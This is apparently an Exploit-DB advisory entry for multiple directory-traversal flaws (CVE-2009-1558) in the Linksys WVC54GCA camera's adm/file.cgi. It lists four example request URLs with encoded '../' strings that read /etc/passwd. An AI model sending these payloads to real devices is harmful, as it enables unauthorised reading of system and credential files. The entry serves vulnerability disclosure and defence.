Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities

EDB-ID:

32954

CVE:

2009-1558

EDB Verified:

Author:

pagvac

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2009-04-23

Vulnerable App: 
source: https://www.securityfocus.com/bid/34713/info

Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is prone to multiple directory-traversal vulnerabilities because the software fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the server process. Information obtained may aid in further attacks.

Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera firmware 1.00R22 and 1.00R24 are affected; other versions may also be vulnerable. 

http://www.example.com/adm/file.cgi?next_file=%2fetc%2fpasswd
http://www.example.com/adm/file.cgi?next_file=%2fetc/passwd
http://www.example.com/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd
http://www.example.com/adm/file.cgi?todo=pwnage&this_file=/etc/passwd
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services